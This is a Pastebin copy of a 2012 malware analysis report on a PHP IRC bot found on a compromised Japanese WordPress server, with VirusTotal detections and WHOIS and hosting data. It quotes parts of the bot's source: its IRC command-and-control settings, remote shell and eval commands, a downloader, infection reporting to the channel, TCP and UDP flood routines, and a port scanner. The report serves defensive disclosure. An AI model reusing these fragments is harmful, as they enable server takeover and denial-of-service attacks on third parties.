unixfreaxjp

#OCJP-040 New Variant PHP/IRC DoS Tools (Win32/Posix)

May 2nd, 2012
883
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ==============================
  2. Operation Cleanup Japan
  3. report: #OCJP-040
  4. Base: http://unixfreaxjp.blogspot.jp/2012/05/ocjp-040.html
  5. VT: https://www.virustotal.com/file/530d50212bf404cf82a40532ec90f90ea9a6533e3d38a233f8d34c15d10a0e8c/analysis/1335907672/
  6. ==============================
  7. This is the PHP IRC/Bot Malware found in Japan IDC Server w/vulnerable Wordpress theme plugin.
  8. Currently is under investigation under #OCJP case : OCJP-040
  9.  
  10. Below is the proof of malicious activities of the object:
  11. ==================
  12. IRC base Bot:
  13. ==================
  14. var $config = array("server"=>"irc.s4l1ty.info",
  15. "port"=>6667,
  16. "pass"=>"zero",
  17. "prefix"=>"ZERO",
  18. "maxrand"=>8,
  19. "chan"=>"#zero",
  20. "key"=>"",
  21. "modes"=>"+iB-x",
  22. "password"=>"zero",
  23. "trigger"=>".",
  24. "hostauth"=>"*" // * for any hostname
  25.  
  26. ==================
  27. DNS Lookup
  28. ==================
  29. config.inc.txt(15): * .dns <IP|HOST> //dns lookup
  30. config.inc.txt(206): case "dns":
  31. config.inc.txt(212): $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
  32. config.inc.txt(216): $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
  33.  
  34. ==================
  35. SERVER REMOTE EXECUTION
  36. ==================
  37. Designed to execute the shell command of the unix or Windows OS if having PHP installed:
  38.  
  39. * .sexec <cmd> // uses shell_exec() //execute a command
  40. * .exec <cmd> // uses exec() //execute a command
  41. * .cmd <cmd> // uses popen() //execute a command
  42. * .php <php code> // uses eval() //execute php code
  43.  
  44. ==================
  45. DOWNLOADER
  46. ==================
  47. Download interface to the hacked system:
  48. * .download <URL> <filename> //download a file
  49. else { $this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file"); }
  50.  
  51.  
  52. ==================
  53. HACKER GROUP ATTACK TOOLS
  54. ==================
  55. This tools belongs to this hacker group:
  56. #crew@corp. since 2003
  57. edited by: devil__ and MEIAFASE <admin@xdevil.org> <meiafase@pucorp.org>
  58. Friend: LP <fuckerboy@sercret.gov>
  59.  
  60.  
  61. ==================
  62. INFECTION NOTIFICATION
  63. ==================
  64. Reporting the infection to the vulnerable machine thru IRC channel:
  65. $this->privmsg($this->config['chan2'],"[\2uname!\2]: $uname (safe: $safemode)");
  66. $this->privmsg($this->config['chan2'],"[\2vuln!\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
  67.  
  68. ==================
  69. DoS / DDoS ATTACK TOOLS
  70. ==================
  71. Three attack tools functions:
  72.  
  73. TCP FLOOD
  74. -----------
  75. * .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack
  76. case "tcpflood":
  77. if(count($mcmd)>5)
  78. {$this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);}
  79. function tcpflood($host,$packets,$packetsize,$port,$delay)
  80. {$this->privmsg($this->config['chan'],"[\2TcpFlood Started!\2]");
  81. $packet = "";
  82. for($i=0;$i<$packetsize;$i++)
  83.  
  84.  
  85. UDP FLOOD
  86. -----------
  87. * .udpflood <target> <packets> <packetsize> <delay> //udpflood attack
  88. function udpflood($host,$packetsize,$time) {
  89. $this->privmsg($this->config['chan'],"[\2Attack Iniciado com sucesso!\2]");
  90. $packet = "";
  91. for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
  92. $timei = time();$i = 0;
  93. while(time()-$timei < $time) {
  94. $fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
  95. fwrite($fp,$packet);fclose($fp);$i++;
  96.  
  97. PORT SCANNING
  98. -----------
  99. * .pscan <host> <port> //port scan
  100. case "pscan": // .pscan 6667
  101. if(count($mcmd) > 2)
  102. { if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))
  103. $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2");
  104. else
  105. $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2");
  106.  
  107. ==================
  108. Portuguesel language used a lot:
  109. ==================
  110. Impossivel mandar e-mail.");
  111. ensagem enviada para \2"
  112. Nao foi possivel fazer o download. Permissao negada.
  113.  
  114. ==================
  115. SPYWARE
  116. ==================
  117. Can send email messages to send infected system credential via IRC, can be used for spamming purpose:
  118. if(!mail($mcmd[1],"InBox Test","#crew@corp. since 2003\n\nip: $c \nsoftware: $b \nsystem: $a \n
  119. {$this->privmsg($this->config['chan'],"[\2inbox\2]: Unable to send");}
  120. else {$this->privmsg($this->config['chan'],"[\2inbox\2]: Message sent to \2".$mcmd[1]."\2");}
  121. $this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
  122. $this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
  123.  
  124. ================================
  125. MALWARE SOURCE
  126. ================================
  127.  
  128. --14:34:56-- http://happymeme.com/uzumaki//wp-content/themes/autofocus/config.inc.txt
  129. => `config.inc.txt'
  130. Resolving happymeme.com... 112.78.112.187
  131. Connecting to happymeme.com|112.78.112.187|:80... connected.
  132. HTTP request sent, awaiting response... 200 OK
  133. Length: 23,375 (23K) [text/plain]
  134. 100%[====================================>] 23,375 81.18K/s
  135. 14:34:59 (80.91 KB/s) - `config.inc.txt' saved [23375/23375]
  136.  
  137.  
  138. ================================
  139. VIRUS TOTAL
  140. ================================
  141. https://www.virustotal.com/file/530d50212bf404cf82a40532ec90f90ea9a6533e3d38a233f8d34c15d10a0e8c/analysis/1335907672/
  142. nProtect : Trojan.Dropper.RYF
  143. K7AntiVirus : Backdoor
  144. VirusBuster : PHP.Shellbot.J
  145. F-Prot : PHP/Pbot.B
  146. Symantec : PHP.Backdoor.Trojan
  147. Norman : PHP/Ircbot.BBPH
  148. TrendMicro-HouseCall : BKDR_PHPBOT.SM
  149. Avast : PHP:IRCBot-AB [Trj]
  150. ClamAV : PHP.Bot
  151. Kaspersky : Backdoor.PHP.Pbot.a
  152. BitDefender : Trojan.Dropper.RYF
  153. Sophos : Troj/PHPBot-F
  154. Comodo : Backdoor.PHP.Pbot.A
  155. F-Secure : Trojan.Dropper.RYF
  156. DrWeb : PHP.BackDoor.14
  157. VIPRE : Backdoor.PHP.Pbot.b (v) (not malicious)
  158. AntiVir : PHP/PBot.A.6
  159. TrendMicro : BKDR_PHPBOT.SM
  160. McAfee-GW-Edition : Heuristic.BehavesLike.JS.Suspicious.G
  161. Emsisoft : Backdoor.PHP.Pbot!IK
  162. eTrust-Vet : PHP/Pbot.D
  163. Jiangmin : Trojan/Script.Gen
  164. Microsoft : Trojan:PHP/Flader.A
  165. GData : Trojan.Dropper.RYF
  166. Commtouch : PHP/Pbot.B
  167. AhnLab-V3 : PHP/Pbot
  168. VBA32 : Backdoor.PHP.Pbot.a
  169. PCTools : Malware.PHP-Backdoor
  170. Rising : Trojan.Script.HTML.Agent.ab
  171. Ikarus : Backdoor.PHP.Pbot
  172. Fortinet : PHP/Pbot.AK!tr.bdr
  173. AVG : PHP/BackDoor.K
  174. Panda : Bck/Pbot.B
  175.  
  176. ================================
  177. NETWORK SOURCE
  178. ================================
  179.  
  180. Routing (AS)
  181. -----------
  182.  
  183. IP: 112.78.112.187
  184. inetnum: 112.78.112.0 - 112.78.112.255
  185. netname: SAKURA-NET
  186. descr: SAKURA Internet Inc.
  187. country: JP
  188. admin-c: KT749JP
  189. tech-c: KW419JP
  190. remarks: This information has been partially mirrored by APNIC from
  191. remarks: JPNIC. To obtain more specific information, please use the
  192. remarks: JPNIC WHOIS Gateway at
  193. remarks: http://www.nic.ad.jp/en/db/whois/en-gateway.html or
  194. remarks: whois.nic.ad.jp for WHOIS client. (The WHOIS client
  195. remarks: defaults to Japanese output, use the /e switch for English
  196. remarks: output)
  197. changed: apnic-ftp@nic.ad.jp 20090303
  198. changed: apnic-ftp@nic.ad.jp 20090331
  199. source: JPNIC
  200.  
  201.  
  202. 112.78.112.0/20
  203. SAKURA-C (4/OSAKA) SAKURA Internet // WEST JAPAN BACKBONE
  204. 1-8-15 Kyutaro-cho, Chuo Osaka 541-0056, Japan
  205.  
  206. AS9371
  207. SAKURA-C SAKURA Internet // WEST JAPAN BACKBONE
  208. Sakaisuji Honmachi Bldg. 9F 1-8-14 Minami-Honmachi,
  209. Chuo-ku Osaka 541-0054, Japan
  210.  
  211.  
  212. Domain
  213. -----------
  214.  
  215. Domain Name: happymeme.com
  216. Created On: 2007-02-25 13:40:54.0
  217. Last Updated On: 2012-02-27 21:37:36.0
  218. Expiration Date: 2013-02-25 04:40:54.0
  219. Status: ACTIVE
  220. Registrant Name: Whois Privacy Protection Service
  221. Registrant Organization: paperboy and co.
  222. Registrant Street1: 2-7-21 Tenjin Chuo-ku
  223. Registrant Street2: Tenjin Prime 8F
  224. Registrant City: Fukuoka-shi
  225. Registrant State: Fukuoka
  226. Registrant Postal Code: 8100001
  227. Registrant Country: JP
  228. Registrant Phone: 81-927137999
  229. Registrant Fax: 81-927137944
  230. Tech Email: privacy@whoisprivacyprotection.info
  231. Name Server: ns1.dns.ne.jp
  232. Name Server: ns2.dns.ne.jp
  233.  
  234. --------------------------------------------------
  235. Host names sharing IP with A records is under the
  236. same risk w/ the current findings (112 items)
  237. --------------------------------------------------
  238. 194964s.com
  239. 2103kakaku.com
  240. aeru21.com
  241. aeruzo.com
  242. aeruzo.net
  243. aitaiyoo.com
  244. aitaizo.com
  245. aitaizo.net
  246. anzen-shisan.com
  247. anzen-toushi.com
  248. b-jays.net
  249. biyo-neosta.com
  250. boku-uma.com
  251. cafebuono.net
  252. carnavi-neosta.com
  253. chanel-neosta.com
  254. chusho-ma.biz
  255. cosmo-support.com
  256. cucina-style.com
  257. cutie-eggs.com
  258. daftbrain.com
  259. dankai-club.com
  260. daveswebworks.com
  261. draxn.net
  262. drbeverlynelson.com
  263. earthworks1.com
  264. ed3s.net
  265. enyasuita.com
  266. extank.com
  267. fukuirin.com
  268. fx-toushi.biz
  269. gaika-yokin.org
  270. gakushi110.com
  271. gan-kenko.com
  272. gooddieter.org
  273. gucci-neosta.com
  274. hajikunshop.com
  275. happyguide.biz
  276. happyguide.info
  277. happymailz.com
  278. happymailz.net
  279. happymeme.com
  280. hlj93.com
  281. hpmls.net
  282. ichikawayuu.com
  283. iheya-genkimura.org
  284. iirufa.com
  285. japangoodsplaza.com
  286. jewelry-neosta.com
  287. ji-joutatsu.com
  288. kanakana-piano.com
  289. kineyakatsuroku.com
  290. koi-iro.com
  291. kojimatsubasa.com
  292. koshunyujob.com
  293. kotaninene.com
  294. kounojimusyo.com
  295. loaddarthtrader.com
  296. lumiere4.com
  297. luxy-party.com
  298. m2051.com
  299. macj-log.com
  300. mail.nagasaka-web.net
  301. mail.s-smile.net
  302. marujyohome.com
  303. mild7-1.net
  304. morigen.info
  305. morita29.com
  306. nagasaka-web.net
  307. newsharaku.com
  308. nibo6.com
  309. nitoroy.com
  310. npo-bsk.com
  311. npo-hima.net
  312. okamotoann.com
  313. onyanco.com
  314. oonoyohei.com
  315. oota-amaharashi.jp
  316. ozakikana.com
  317. penki-nurikae.com
  318. potyari.biz
  319. recorder-neosta.com
  320. redrox.net
  321. reiki-a.com
  322. reiki-dream.net
  323. rightsangyou.com
  324. ryuzo-nakata.com
  325. s-smile.net
  326. sakaidaiki.com
  327. sankei-inc.com
  328. sekengaku.org
  329. sekiaya.com
  330. sheadream.com
  331. shibataindustries.com
  332. shimadadaiki.com
  333. shisan-unyou.info
  334. smileagefan.com
  335. t-zei.jp
  336. ton-kichi.net
  337. toushi-fx.net
  338. uchiyamahinata.com
  339. www.h-sketch.com
  340. www.oota-amaharashi.jp
  341. www.penki-nurikae.com
  342. www.t-zei.jp
  343. xn--torr3dy20axh7a.com (.com)
  344. yamacho-club.com
  345. yen-energy.com
  346. yoke-kichijoji.com
  347. yokohamahikari.com
  348. yosapark-saribaba.com
  349. yurai-seitai.net
  350. ------
  351. ZeroDay Japan http://0day.jp
  352. OPERATION CLEANUP JAPAN | #OCJP
  353. Analyst: Hendrik ADRIAN アドリアン・ヘンドリック Malware Researcher VT/ twitter/google: @unixfreaxjp
  354. sponsored by: 株式会社ケイエルジェイテック http://www.kljtech.com
RAW Paste Data